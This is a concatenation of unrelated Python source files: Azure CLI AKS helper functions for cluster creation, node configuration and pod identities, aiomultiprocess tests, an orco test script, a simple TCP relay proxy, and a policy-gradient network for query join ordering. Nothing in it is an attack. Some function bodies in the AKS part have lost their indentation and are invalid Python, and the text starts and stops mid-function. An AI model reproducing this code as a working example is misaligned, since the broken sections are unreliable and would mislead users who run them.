    """Return *msg* wrapped in ANSI bold plus colorama bright styling."""
    return ''.join(('\033[1m', colorama.Style.BRIGHT, format(msg), colorama.Style.RESET_ALL))
def format_hyperlink(the_link):
    """Return *the_link* styled bold and blue so it stands out as a URL."""
    return ''.join(('\033[1m', colorama.Style.BRIGHT, colorama.Fore.BLUE,
                    format(the_link), colorama.Style.RESET_ALL))
def get_aks_custom_headers(aks_custom_headers=None):
    """Parse a comma-separated "key=value" string into a headers dict.

    :param aks_custom_headers: string like "k1=v1,k2=v2", or None/empty.
    :return: dict of header name -> value; empty dict when no input.
    :raises CLIError: when a pair contains no '=' separator.
    """
    headers = {}
    if not aks_custom_headers:
        return headers
    for pair in aks_custom_headers.split(','):
        # Split on the FIRST '=' only so header values may themselves
        # contain '=' (e.g. base64-encoded payloads); the previous
        # split('=') rejected such values.
        key, sep, value = pair.partition('=')
        if not sep:
            raise CLIError('custom headers format is incorrect')
        headers[key] = value
    return headers
def _put_managed_cluster_ensuring_permission(
        cmd,  # pylint: disable=too-many-locals,too-many-statements,too-many-branches
        client,
        subscription_id,
        resource_group_name,
        name,
        managed_cluster,
        monitoring_addon_enabled,
        ingress_appgw_addon_enabled,
        enable_managed_identity,
        attach_acr,
        headers,
        no_wait
):
    """PUT the managed cluster, then grant role assignments that can only be
    made after the cluster (and its identities) exist.

    When any post-creation role assignment is needed, the PUT is awaited
    (ignoring no_wait) because the created cluster object is required for
    the assignments; otherwise no_wait is honoured.
    """
    # some addons require post cluster creation role assigment
    need_post_creation_role_assignment = monitoring_addon_enabled or ingress_appgw_addon_enabled or (enable_managed_identity and attach_acr)
    if need_post_creation_role_assignment:
        # adding a wait here since we rely on the result for role assignment
        cluster = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
            resource_group_name=resource_group_name,
            resource_name=name,
            parameters=managed_cluster,
            custom_headers=headers))
        cloud_name = cmd.cli_ctx.cloud.name
        # add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
        # mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
        if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
            from msrestazure.tools import resource_id
            cluster_resource_id = resource_id(
                subscription=subscription_id,
                resource_group=resource_group_name,
                namespace='Microsoft.ContainerService', type='managedClusters',
                name=name
            )
            _add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
        if ingress_appgw_addon_enabled:
            _add_ingress_appgw_addon_role_assignment(cluster, cmd)
        if enable_managed_identity and attach_acr:
            # Attach ACR to cluster enabled managed identity
            # Best-effort: a missing kubelet identity only warns, it does not fail
            # the (already successful) cluster creation.
            if cluster.identity_profile is None or \
                    cluster.identity_profile["kubeletidentity"] is None:
                logger.warning('Your cluster is successfully created, but we failed to attach '
                               'acr to it, you can manually grant permission to the identity '
                               'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
                               'it permission to pull from ACR.')
            else:
                kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
                _ensure_aks_acr(cmd.cli_ctx,
                                client_id=kubelet_identity_client_id,
                                acr_name_or_id=attach_acr,
                                subscription_id=subscription_id)
    else:
        cluster = sdk_no_wait(no_wait, client.create_or_update,
                              resource_group_name=resource_group_name,
                              resource_name=name,
                              parameters=managed_cluster,
                              custom_headers=headers)
    return cluster
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or managed_cluster.identity.type.casefold() == "userassigned"))
def _get_kubelet_config(file_path):
    """Load a kubelet configuration JSON file into a KubeletConfig model.

    :param file_path: path to the JSON file (schema: https://aka.ms/CustomNodeConfig).
    :raises CLIError: when the file does not contain a JSON object.
    """
    kubelet_config = get_file_json(file_path)
    if not isinstance(kubelet_config, dict):
        raise CLIError("Error reading kubelet configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
    config_object = KubeletConfig()
    # Map the camelCase JSON keys onto the snake_case model attributes;
    # absent keys become None, matching the service defaults.
    field_map = {
        "cpu_manager_policy": "cpuManagerPolicy",
        "cpu_cfs_quota": "cpuCfsQuota",
        "cpu_cfs_quota_period": "cpuCfsQuotaPeriod",
        "image_gc_high_threshold": "imageGcHighThreshold",
        "image_gc_low_threshold": "imageGcLowThreshold",
        "topology_manager_policy": "topologyManagerPolicy",
        "allowed_unsafe_sysctls": "allowedUnsafeSysctls",
        "fail_swap_on": "failSwapOn",
    }
    for attr, key in field_map.items():
        setattr(config_object, attr, kubelet_config.get(key, None))
    return config_object
def _get_linux_os_config(file_path):
    """Load a Linux OS configuration JSON file into a LinuxOSConfig model.

    :param file_path: path to the JSON file (schema: https://aka.ms/CustomNodeConfig).
    :raises CLIError: when the file, or its "sysctls" section, is not a JSON object.
    """
    os_config = get_file_json(file_path)
    if not isinstance(os_config, dict):
        raise CLIError("Error reading Linux OS configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
    config_object = LinuxOSConfig()
    config_object.transparent_huge_page_enabled = os_config.get("transparentHugePageEnabled", None)
    config_object.transparent_huge_page_defrag = os_config.get("transparentHugePageDefrag", None)
    config_object.swap_file_size_mb = os_config.get("swapFileSizeMB", None)
    # sysctl settings: a missing or non-object "sysctls" section is rejected
    # the same way as a malformed top-level document.
    sysctls = os_config.get("sysctls", None)
    if not isinstance(sysctls, dict):
        raise CLIError("Error reading Sysctl settings at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
    config_object.sysctls = SysctlConfig()
    # Map the camelCase JSON keys onto the snake_case model attributes;
    # absent keys become None, matching the service defaults.
    sysctl_map = {
        "net_core_somaxconn": "netCoreSomaxconn",
        "net_core_netdev_max_backlog": "netCoreNetdevMaxBacklog",
        "net_core_rmem_max": "netCoreRmemMax",
        "net_core_wmem_max": "netCoreWmemMax",
        "net_core_optmem_max": "netCoreOptmemMax",
        "net_ipv4_tcp_max_syn_backlog": "netIpv4TcpMaxSynBacklog",
        "net_ipv4_tcp_max_tw_buckets": "netIpv4TcpMaxTwBuckets",
        "net_ipv4_tcp_fin_timeout": "netIpv4TcpFinTimeout",
        "net_ipv4_tcp_keepalive_time": "netIpv4TcpKeepaliveTime",
        "net_ipv4_tcp_keepalive_probes": "netIpv4TcpKeepaliveProbes",
        # NOTE: attribute name below matches the model's existing spelling.
        "net_ipv4_tcpkeepalive_intvl": "netIpv4TcpkeepaliveIntvl",
        "net_ipv4_tcp_rmem": "netIpv4TcpRmem",
        "net_ipv4_tcp_wmem": "netIpv4TcpWmem",
        "net_ipv4_tcp_tw_reuse": "netIpv4TcpTwReuse",
        "net_ipv4_ip_local_port_range": "netIpv4IpLocalPortRange",
        "net_ipv4_neigh_default_gc_thresh1": "netIpv4NeighDefaultGcThresh1",
        "net_ipv4_neigh_default_gc_thresh2": "netIpv4NeighDefaultGcThresh2",
        "net_ipv4_neigh_default_gc_thresh3": "netIpv4NeighDefaultGcThresh3",
        "net_netfilter_nf_conntrack_max": "netNetfilterNfConntrackMax",
        "net_netfilter_nf_conntrack_buckets": "netNetfilterNfConntrackBuckets",
        "fs_inotify_max_user_watches": "fsInotifyMaxUserWatches",
        "fs_file_max": "fsFileMax",
        "fs_aio_max_nr": "fsAioMaxNr",
        "fs_nr_open": "fsNrOpen",
        "kernel_threads_max": "kernelThreadsMax",
        "vm_max_map_count": "vmMaxMapCount",
        "vm_swappiness": "vmSwappiness",
        "vm_vfs_cache_pressure": "vmVfsCachePressure",
    }
    for attr, key in sysctl_map.items():
        setattr(config_object.sysctls, attr, sysctls.get(key, None))
    return config_object
def _ensure_pod_identity_addon_is_enabled(instance):
addon_enabled = False
if instance and instance.pod_identity_profile:
addon_enabled = instance.pod_identity_profile.enabled
if not addon_enabled:
raise CLIError('The pod identity addon is not enabled for this managed cluster yet.\n'
'To enable, run "az aks update --enable-pod-identity')
def _update_addon_pod_identity(instance, enable, pod_identities=None, pod_identity_exceptions=None):
if not enable:
# when disable, null out the profile
instance.pod_identity_profile = None
return
if not instance.pod_identity_profile:
# not set before
instance.pod_identity_profile = ManagedClusterPodIdentityProfile(
enabled=True,
user_assigned_identities=pod_identities,
user_assigned_identity_exceptions=pod_identity_exceptions,
)
return
instance.pod_identity_profile.enabled = True
instance.pod_identity_profile.user_assigned_identities = pod_identities or []
instance.pod_identity_profile.user_assigned_identity_exceptions = pod_identity_exceptions or []
def _ensure_managed_identity_operator_permission(cli_ctx, instance, scope):
    """Ensure the cluster's control-plane identity holds the
    'Managed Identity Operator' role over *scope* (a user-assigned identity
    resource id), creating the role assignment only when it is missing.

    :raises CLIError: for unsupported identity types, an unresolvable cluster
        identity, or a failed role assignment.
    """
    managed_identity_operator_role = 'Managed Identity Operator'
    managed_identity_operator_role_id = 'f1a07417-d97a-45cb-824c-7a7467783830'
    # Resolve the object id of the identity that will operate pod identities.
    cluster_identity_object_id = None
    if instance.identity.type.lower() == 'userassigned':
        # Only the first user-assigned identity is considered.
        for identity in instance.identity.user_assigned_identities.values():
            cluster_identity_object_id = identity.principal_id
            break
    elif instance.identity.type.lower() == 'systemassigned':
        cluster_identity_object_id = instance.identity.principal_id
    else:
        raise CLIError('unsupported identity type: {}'.format(instance.identity.type))
    if cluster_identity_object_id is None:
        raise CLIError('unable to resolve cluster identity')
    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments
    # Skip creation when an equivalent assignment already exists at this scope.
    for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
        if i.scope.lower() != scope.lower():
            continue
        if not i.role_definition_id.lower().endswith(managed_identity_operator_role_id):
            continue
        if i.principal_id.lower() != cluster_identity_object_id.lower():
            continue
        # already assigned
        return
    if not _add_role_assignment(cli_ctx, managed_identity_operator_role, cluster_identity_object_id,
                                is_service_principal=False, scope=scope):
        raise CLIError('Could not grant Managed Identity Operator permission for cluster')
    # need more time to propogate this assignment...
    print()
    print('Wait 30 seconds for identity role assignment propagation.')
    time.sleep(30)
def aks_pod_identity_add(cmd, client, resource_group_name, cluster_name,
                         identity_name, identity_namespace, identity_resource_id,
                         no_wait=False):  # pylint: disable=unused-argument
    """Add a pod identity (name + namespace + user-assigned identity) to the
    cluster's pod identity profile and push the update to the service."""
    instance = client.get(resource_group_name, cluster_name)
    _ensure_pod_identity_addon_is_enabled(instance)
    user_assigned_identity = _get_user_assigned_identity(cmd.cli_ctx, identity_resource_id)
    # The cluster identity must be able to operate the user-assigned identity
    # before the pod identity referencing it is added.
    _ensure_managed_identity_operator_permission(cmd.cli_ctx, instance, user_assigned_identity.id)
    pod_identities = []
    if instance.pod_identity_profile.user_assigned_identities:
        pod_identities = instance.pod_identity_profile.user_assigned_identities
    pod_identity = ManagedClusterPodIdentity(
        name=identity_name,
        namespace=identity_namespace,
        identity=UserAssignedIdentity(
            resource_id=user_assigned_identity.id,
            client_id=user_assigned_identity.client_id,
            object_id=user_assigned_identity.principal_id,
        )
    )
    pod_identities.append(pod_identity)
    _update_addon_pod_identity(
        instance, enable=True,
        pod_identities=pod_identities,
        pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
    )
    # send the managed cluster represeentation to update the pod identity addon
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_delete(cmd, client, resource_group_name, cluster_name,
                            identity_name, identity_namespace,
                            no_wait=False):  # pylint: disable=unused-argument
    """Remove the pod identity matching name + namespace and push the update."""
    instance = client.get(resource_group_name, cluster_name)
    _ensure_pod_identity_addon_is_enabled(instance)
    existing = instance.pod_identity_profile.user_assigned_identities or []
    # Keep every identity except the (name, namespace) match being deleted.
    remaining = [
        identity for identity in existing
        if not (identity.name == identity_name and identity.namespace == identity_namespace)
    ]
    _update_addon_pod_identity(
        instance, enable=True,
        pod_identities=remaining,
        pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
    )
    # send the updated managed cluster representation to the service
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_list(cmd, client, resource_group_name, cluster_name):  # pylint: disable=unused-argument
    """Show the managed cluster (nulls stripped), including its pod identities."""
    managed_cluster = client.get(resource_group_name, cluster_name)
    return _remove_nulls([managed_cluster])[0]
def aks_pod_identity_exception_add(cmd, client, resource_group_name, cluster_name,
                                   exc_name, exc_namespace, pod_labels, no_wait=False):  # pylint: disable=unused-argument
    """Append a pod identity exception (pods matching *pod_labels* in
    *exc_namespace* bypass the NMI) and push the updated cluster."""
    instance = client.get(resource_group_name, cluster_name)
    _ensure_pod_identity_addon_is_enabled(instance)
    exceptions = instance.pod_identity_profile.user_assigned_identity_exceptions or []
    exceptions.append(
        ManagedClusterPodIdentityException(name=exc_name, namespace=exc_namespace, pod_labels=pod_labels))
    _update_addon_pod_identity(
        instance, enable=True,
        pod_identities=instance.pod_identity_profile.user_assigned_identities,
        pod_identity_exceptions=exceptions,
    )
    # send the updated managed cluster representation to the service
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_delete(cmd, client, resource_group_name, cluster_name,
                                      exc_name, exc_namespace, no_wait=False):  # pylint: disable=unused-argument
    """Remove the pod identity exception matching name + namespace and push
    the updated cluster."""
    instance = client.get(resource_group_name, cluster_name)
    _ensure_pod_identity_addon_is_enabled(instance)
    existing = instance.pod_identity_profile.user_assigned_identity_exceptions or []
    # Keep every exception except the (name, namespace) match being deleted.
    remaining = [
        exc for exc in existing
        if not (exc.name == exc_name and exc.namespace == exc_namespace)
    ]
    _update_addon_pod_identity(
        instance, enable=True,
        pod_identities=instance.pod_identity_profile.user_assigned_identities,
        pod_identity_exceptions=remaining,
    )
    # send the updated managed cluster representation to the service
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_update(cmd, client, resource_group_name, cluster_name,
                                      exc_name, exc_namespace, pod_labels, no_wait=False):  # pylint: disable=unused-argument
    """Replace the pod labels of an existing pod identity exception.

    :raises CLIError: when no exception matches name + namespace.
    """
    instance = client.get(resource_group_name, cluster_name)
    _ensure_pod_identity_addon_is_enabled(instance)
    replacement = ManagedClusterPodIdentityException(name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
    existing = instance.pod_identity_profile.user_assigned_identity_exceptions or []

    def _matches(exc):
        return exc.name == exc_name and exc.namespace == exc_namespace

    if not any(_matches(exc) for exc in existing):
        raise CLIError('pod identity exception {}/{} not found'.format(exc_namespace, exc_name))
    # Swap the matching entry (preserving order) for the updated one.
    updated = [replacement if _matches(exc) else exc for exc in existing]
    _update_addon_pod_identity(
        instance, enable=True,
        pod_identities=instance.pod_identity_profile.user_assigned_identities,
        pod_identity_exceptions=updated,
    )
    # send the updated managed cluster representation to the service
    return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_list(cmd, client, resource_group_name, cluster_name):
    """Show the managed cluster (nulls stripped), including its pod identity exceptions."""
    managed_cluster = client.get(resource_group_name, cluster_name)
    return _remove_nulls([managed_cluster])[0]
|
core.py | # Copyright 2018 John Reese
# Licensed under the MIT license
import asyncio
import os
from unittest import TestCase
import aiomultiprocess as amp
from aiomultiprocess.core import context, PoolWorker
from .base import async_test
async def mapper(value):
    """Trivial async map target: return *value* doubled."""
    doubled = value * 2
    return doubled
async def starmapper(*values):
    """Trivial async starmap target: double every positional argument."""
    return list(map(lambda item: item * 2, values))
class CoreTest(TestCase):
    """Unit tests for aiomultiprocess Process/Worker/PoolWorker/Pool."""
    @async_test
    async def test_process(self):
        # A Process exposes name/pid, stays alive until its coroutine
        # target finishes, and is dead after join().
        async def sleepy():
            await asyncio.sleep(0.1)
        p = amp.Process(target=sleepy, name="test_process")
        p.start()
        self.assertEqual(p.name, "test_process")
        self.assertTrue(p.pid)
        self.assertTrue(p.is_alive())
        await p.join()
        self.assertFalse(p.is_alive())
    @async_test
    async def test_process_timeout(self):
        # join(timeout=...) must raise when the child outlives the timeout.
        async def sleepy():
            await asyncio.sleep(1)
        p = amp.Process(target=sleepy)
        p.start()
        with self.assertRaises(asyncio.TimeoutError):
            await p.join(timeout=0.01)
    @async_test
    async def test_worker(self):
        # A Worker stores its coroutine's return value in .result.
        async def sleepypid():
            await asyncio.sleep(0.1)
            return os.getpid()
        p = amp.Worker(target=sleepypid)
        p.start()
        await p.join()
        self.assertFalse(p.is_alive())
        self.assertEqual(p.result, p.pid)
    @async_test
    async def test_worker_join(self):
        # join() returns the worker's result; awaiting the worker directly
        # starts it implicitly.
        async def sleepypid():
            await asyncio.sleep(0.1)
            return os.getpid()
        # test results from join
        p = amp.Worker(target=sleepypid)
        p.start()
        self.assertEqual(await p.join(), p.pid)
        # test awaiting p directly, no need to start
        p = amp.Worker(target=sleepypid)
        self.assertEqual(await p, p.pid)
    @async_test
    async def test_pool_worker(self):
        # A PoolWorker with maxtasks=1 handles one queued task then exits.
        tx = context.Queue()
        rx = context.Queue()
        worker = PoolWorker(tx, rx, 1)
        worker.start()
        self.assertTrue(worker.is_alive())
        tx.put_nowait((1, mapper, (5,), {}))
        await asyncio.sleep(0.5)
        result = rx.get_nowait()
        self.assertEqual(result, (1, 10))
        self.assertFalse(worker.is_alive())  # maxtasks == 1
    @async_test
    async def test_pool(self):
        # Pool apply/map/starmap must agree with running the coroutines inline.
        values = list(range(10))
        results = [await mapper(i) for i in values]
        async with amp.Pool(2) as pool:
            await asyncio.sleep(0.5)
            self.assertEqual(pool.process_count, 2)
            self.assertEqual(len(pool.processes), 2)
            self.assertEqual(await pool.apply(mapper, (values[0],)), results[0])
            self.assertEqual(await pool.map(mapper, values), results)
            self.assertEqual(
                await pool.starmap(starmapper, [values[:4], values[4:]]),
                [results[:4], results[4:]],
            )
|
test.py | import itertools
import os
import random
import threading
import time
from orco import Runtime, LocalExecutor
# Start from a clean database so every run exercises the same code paths.
if os.path.isfile("test.db"):
    os.unlink("test.db")
rt = Runtime("test.db")
# Executor 1: normal local executor with a single worker process.
executor = LocalExecutor(heartbeat_interval=1, n_processes=1)
rt.register_executor(executor)
# Executor 2: registered with its heartbeat suppressed (stale-executor case).
executor2 = LocalExecutor(heartbeat_interval=1)
executor2._debug_do_not_start_heartbeat = True
rt.register_executor(executor2)
# Executor 3: registered and immediately stopped.
executor3 = LocalExecutor(heartbeat_interval=1)
rt.register_executor(executor3)
executor3.stop()
# "sleepers" sleeps for the configured duration; "bedrooms" depends on
# one sleeper task per entry in its "sleepers" config list.
c_sleepers = rt.register_builder("sleepers", lambda c, d: time.sleep(c))
c_bedrooms = rt.register_builder("bedrooms", lambda c, d: None,
                                 lambda c: [c_sleepers.task(x) for x in c["sleepers"]])
def failer(config, deps):
    # Builder function that always raises; used to exercise error reporting.
    raise Exception("Here!")
c_failers = rt.register_builder("failers", failer)
# A failing computation must surface its exception to the caller.
try:
    rt.compute(c_failers.task({"type": "fail1"}))
except Exception as e:
    print(e)
    print("Failer failed (and it is ok")
rt.compute(c_bedrooms.task({"sleepers": [0.1]}))
# Kick off a longer computation in the background while the server runs.
t = threading.Thread(target=(lambda: rt.compute(c_bedrooms.task({"sleepers": list(range(10))}))))
t.start()
time.sleep(0.5) # To solve a problem with ProcessPool, fix waits for Python3.7
c = rt.register_builder("hello")
rt.insert(c.task("e1"), "ABC")
# Insert a large (~7 MB) value to exercise big-blob storage.
rt.insert(c.task("e2"), "A" * (7 * 1024 * 1024 + 200000))
c = rt.register_builder("estee")
graphs = ["crossv", "fastcrossv", "gridcat"]
models = ["simple", "maxmin"]
scheduler = [
    "blevel", "random", {
        "name": "camp",
        "iterations": 1000
    }, {
        "name": "camp",
        "iterations": 2000
    }
]
# Populate "estee" with a random result for every graph/model/scheduler combo.
for g, m, s in itertools.product(graphs, models, scheduler):
    rt.insert(c.task({"graph": g, "model": m, "scheduler": s}), random.randint(1, 30000))
c = rt.register_builder("builder with space in name")
rt.serve()
|
proxy.py | import threading
import socket
from toolkit.network import basic # pylint: disable=import-error
class Proxy():
    """Bidirectional TCP proxy.

    Accepts one inbound connection, opens one outbound connection, and pumps
    data both ways through user-supplied handler callbacks that may inspect
    or rewrite each message.

    NOTE(review): serverAddr is built from the *client* arguments and
    clientAddr from the *server* arguments — preserved as-is; confirm the
    intent against callers.
    """

    def __init__(self, serverport, serveraddr, clientport, clientaddr):
        # Fix: removed a stray threading.Thread.__init__(self) call — this
        # class does not subclass threading.Thread.
        self.running = True
        self.serverAddr = (clientaddr, clientport)
        self.clientAddr = (serveraddr, serverport)
        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.serverConn = None
        self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    def handlerServer(self, args, handler):
        """Pump accepted connection -> outbound client until stopped or EOF."""
        try:
            while self.running:
                data = basic.recvall(self.serverConn)
                data = handler(data)
                self.client.sendall(data)
                if not self.running or data == b"":
                    self.stop()
                    break
        except ConnectionAbortedError:
            pass

    def handlerClient(self, args, handler):
        """Pump outbound client -> accepted connection until stopped or EOF.

        Fix: now a normal bound method; previously it took an extra explicit
        ``_self_`` argument because the thread was started with both the bound
        method and the instance.
        """
        try:
            while self.running:
                data = basic.recvall(self.client)
                data = handler(data)
                self.serverConn.sendall(data)
                if not self.running or data == b"":
                    self.stop()
                    break
        except ConnectionAbortedError:
            pass

    def stop(self):
        """Stop pumping and close all sockets; safe to call more than once."""
        self.running = False
        self.server.close()
        self.client.close()
        # Fix: guard against closing before any connection was accepted.
        if self.serverConn is not None:
            self.serverConn.close()
        try:
            self.clientThread.join()
        except (AttributeError, RuntimeError):
            # No client thread was started yet, or stop() was invoked from
            # within the client thread itself (joining the current thread).
            pass

    def start(self, clientArgs, serverArgs, server2client, client2server):
        """Accept one inbound connection, connect outbound, and pump both ways.

        Blocks in handlerServer until the proxy stops; the client direction
        runs on a background thread.
        """
        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.server.bind(self.serverAddr)
        self.server.listen()
        conn, _ = self.server.accept()
        self.serverConn = conn
        self.client.connect(self.clientAddr)
        self.clientThread = threading.Thread(target=self.handlerClient, args=[clientArgs, client2server])
        self.clientThread.start()
        self.handlerServer(serverArgs, server2client)
|
policy_grad.py | from plan import *
from database_env import DataBaseEnv_QueryEncoding
from utils.utils import *
from utils.db_utils import *
from tree import *
import torch.multiprocessing as mp
import torch
import torch.nn as nn
import numpy as np
from copy import deepcopy
import time
from torch.utils.tensorboard import SummaryWriter
import re
import logging
# Module-level logger for this training module.
LOG = logging.getLogger(__name__)
# Large finite constant used to mask invalid action logits (stands in for +inf).
INF = 1e9
# def loss_func(pred, target):
# # target = [b_indices, dim_1_indices, dim_2_indices], q-values
# # pred.shape = [Nf, max(ni), max(ni)
# # print(pred[target[0]][:10])
# # print(target[1][:10])
# # preds = torch.clamp(pred[target[0]], max=float(np.log(3*10**5)))
# preds = pred[target[0]]
# return torch.nn.functional.mse_loss(preds, target[1])
class EnvBase(DataBaseEnv_QueryEncoding):
    """Query-encoding DB environment that also attaches per-node feature vectors."""

    def __init__(self, env_config):
        super().__init__(env_config)
        # Optional mapping: query -> {relation name -> cardinality}.
        self.cardinalities = env_config.get("cardinalities")

    def apply_plan_encoding(self, plan):
        """Attach a "feature" row vector to every plan-graph node lacking one."""
        graph = plan.G
        for node in graph:
            info = graph.nodes[node]
            if "feature" in info:
                continue
            if self.cardinalities:
                # One slot per relation plus a trailing cardinality slot,
                # filled only for named (base-relation) nodes.
                vec = np.zeros(len(self.rels) + 1)
                if 'name' in info:
                    vec[-1] = self.cardinalities[plan.initial_query][info['name']]
            else:
                # Multi-hot vector over the tables referenced by this node.
                vec = np.zeros(len(self.rels))
                vec[[self.rel_to_idx[t] for t in info['tables']]] = 1
            graph.nodes[node]["feature"] = vec.reshape(1, -1)

    def get_obs(self, plan=None):
        """Return (base observation, forest form) for *plan* (default: current plan)."""
        target = plan if plan else self.plan
        self.apply_plan_encoding(target)
        return super().get_obs(target), to_forest(target)
class EnvPlan(EnvBase):
    """Single-plan environment: one join per step until the plan is complete."""

    def __init__(self, env_config, true_reward=True):
        super().__init__(env_config)
        # When True, the real reward (cost/latency) is computed on completion.
        self.true_reward = true_reward

    def get_state(self):
        """Return the encoded observation for the current plan."""
        return self.get_obs(self.plan)

    def step(self, action):
        """Apply one join action; returns (None, cost, done, None) gym-style.

        cost is only populated on a completed plan when true_reward is set.
        """
        self.plan.join(*self.plan.action_to_join(action))
        done = self.plan.is_complete
        cost = self.reward() if (done and self.true_reward) else None
        return None, cost, done, None
# class EnvPlanBeam(EnvBase):
# def __init__(self, env_config, beam_width, true_reward=True):
# super().__init__(env_config)
# self.true_reward = true_reward
# self.beam_width = beam_width
#
# def reset(self, idx=None):
# super().reset(idx)
# self.plans = [self.plan]
#
# def get_states(self):
# obs = []
# for plan in self.plans:
# obs.append(self.get_obs(plan))
# return obs
#
# def step(self, actions):
# plans = {}
# for i, a in enumerate(actions):
# p = deepcopy(self.plans[i])
# p.join(*p.action_to_join(a), action=a)
# plans[p] = None
# if len(plans) == self.beam_width:
# break
# self.plans = list(plans.keys())
# is_complete = self.plans[0].is_complete
# cost = None
# self.plan = self.plans[0]
# if self.true_reward:
# cost = self.reward()
# return None, cost, is_complete, None
def FC(d_in, d_out, fc_nlayers, drop):
    """Build an MLP whose layer widths interpolate linearly from d_in to d_out.

    Each hidden step is Linear -> Dropout -> LayerNorm -> ReLU; the final
    Linear maps onto d_out with no activation. fc_nlayers is the number of
    Linear layers in total.
    """
    widths = [int(w) for w in torch.linspace(d_in, d_out, fc_nlayers + 1, dtype=torch.long)]
    layers = []
    # Hidden blocks over consecutive width pairs (all but the last pair).
    for w_in, w_out in zip(widths[:-2], widths[1:-1]):
        layers += [nn.Linear(w_in, w_out), nn.Dropout(drop),
                   nn.LayerNorm([w_out]), nn.ReLU()]
    layers.append(nn.Linear(widths[-2], d_out))
    return nn.Sequential(*layers)
class Net(nn.Module):
    """Tree-transformer policy/value network over join-plan forests."""
    # NOTE(review): fit_pretrained_layers=[] is a mutable default argument;
    # it is only read here, but fragile if a caller ever mutates it.
    def __init__(self, d_emb, d_query, d_model, d_pairwise, nhead, ffdim, nlayers, fc_nlayers, drop, pretrained_path=False, fit_pretrained_layers=[], **kwargs):
        super().__init__()
        # Remember constructor args so an identical net can be re-instantiated.
        self.args = {k: v for k, v in locals().items() if k not in [
            'self', '__class__']}
        # Tree transformer
        self.enc = nn.Linear(d_emb, (d_model+1)//2)
        self.trans_enc = nn.TransformerEncoder(
            TreeTransformerEncoderLayer(d_model, nhead, ffdim, drop), nlayers)
        # Learnable CLS token prepended to every tree sequence.
        self.cls = nn.Parameter(torch.empty((1, 1, d_model)))
        torch.nn.init.xavier_uniform_(self.cls, gain=1.0)
        # Pairwise module to get values for each possible action
        # self.key = torch.nn.Linear(d_model, d_pairwise)
        # self.query = torch.nn.Linear(d_model, d_pairwise)
        # FC layers
        self.key = FC(d_model, d_pairwise, fc_nlayers, drop)
        self.query = FC(d_model, d_pairwise, fc_nlayers, drop)
        self.val = FC(d_model, 1, fc_nlayers, drop)
        # Query level
        d_q = d_model // 2
        self.qn = nn.Sequential(nn.Linear(d_query, d_q))
        self.pretrained_path = pretrained_path
        self.fit_pretrained_layers = fit_pretrained_layers
    def forward(self, inputs):
        """Return (P, V): pairwise join logits [Nf, max(ni), max(ni)] and
        per-forest value estimates [Nf, 1]."""
        q, t = inputs
        q = self.qn(q).unsqueeze(0)  # [1, (n1+n2+...), d_model // 2]
        x, indices, lens = t
        # [L, (n1+n2+...), d_model // 2]; ni = number of trees in i-th forest
        x = self.enc(x)
        # [L, (n1+n2+...), d_model]
        x = torch.cat((x, q.expand(x.shape[0], -1, -1)), -1)
        x = torch.cat((self.cls.expand(-1, x.shape[1], -1), x), 0)
        x, _ = self.trans_enc((x, indices))  # [1, (n1+n2+...), d_model], ...
        # Regroup the flat per-tree CLS outputs back into per-forest sequences.
        l = torch.split(x[0], lens)
        x = torch.nn.utils.rnn.pad_sequence(
            l, batch_first=True)  # [Nf, max(ni), d_model]
        V = self.val(torch.mean(x, 1))  # [Nf, 1]
        k, q = self.key(x), self.query(x)
        # Scaled dot-product between every pair of trees within each forest.
        P = (torch.matmul(k, q.transpose(1, 2))
             / np.sqrt(k.shape[-1]))  # [Nf, max(ni), max(ni)]
        return P, V
    # def new(self):
    #     if self.pretrained_path:
    #         model = deepcopy(self)
    #         model.load_state_dict(torch.load(self.pretrained_path))
    #         return model
    #     else:
    #         return self.__class__(**self.args)
def collate(batch):
    """Collate either raw observations or whole trajectories into tensors.

    Two modes, distinguished by the type of batch[0][0]:
    - observation batch: list of (query-encoding ndarray, forest) pairs;
      returns (q_enc, (flattened tree-conv tensors..., lens)).
    - trajectory batch: list of trajectories (lists of (obs, target) steps);
      flattened first, then the obs part is collated recursively.
    """
    if isinstance(batch[0][0], np.ndarray):
        q_enc, forests = zip(*batch)
        lens = [len(f) for f in forests]
        flatten_tc_batch = flatten_batch_TreeConv([t.to_torch().to(
            dtype=torch.float) for f in forests for t in f], batch_first=False)
        # Repeat each query encoding once per tree in its forest so the rows
        # line up with the flattened tree batch.
        q_enc = torch.repeat_interleave(torch.tensor(
            q_enc, dtype=torch.float), torch.tensor(lens), dim=0)
        # [n_sum, d_qenc], ([L,n_sum,d_enc],[3L,n_sum,1],[batch_size])
        return q_enc, (*flatten_tc_batch, lens)
    # batch is a list of trajectories with different length
    # make it flat first
    batch = [x for traj in batch for x in traj]
    x, y = zip(*batch)
    actions, valid_mask, done_mask, rewards = zip(*y)
    valid_mask = stack_masks(list(valid_mask))
    size = valid_mask.shape[1]
    # flat_actions = [list(range(len(actions))),
